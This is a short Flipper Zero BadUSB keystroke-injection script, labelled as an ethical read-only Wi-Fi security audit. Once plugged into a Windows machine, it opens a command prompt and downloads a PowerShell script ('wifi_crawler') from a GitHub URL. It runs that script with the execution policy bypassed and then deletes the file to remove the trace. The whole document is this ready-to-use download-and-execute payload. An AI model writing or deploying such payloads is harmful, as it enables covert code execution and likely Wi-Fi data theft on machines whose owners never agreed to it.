REM =========================================
REM WiFi Security Audit - Flipper Zero
REM Download -> Execute -> Cleanup
REM Read-only | Ethical | CyberRedPanda
REM =========================================

ID US
DELAY 1000

GUI r
DELAY 500
STRING cmd
ENTER
DELAY 800

REM --- Descargar script desde GitHub ---
STRING curl.exe -L https://raw.githubusercontent.com/hacker-Cabronico/Flipper_Zero/main/000-wifi_crawler/000-wifi_crawler.ps1 -o "%USERPROFILE%\wifi_audit.ps1"
ENTER
DELAY 3000

REM --- Ejecutar script ---
STRING powershell -NoProfile -ExecutionPolicy Bypass -File "%USERPROFILE%\wifi_audit.ps1"
ENTER
DELAY 5000

REM --- Limpiar ---
STRING del "%USERPROFILE%\wifi_audit.ps1"
ENTER
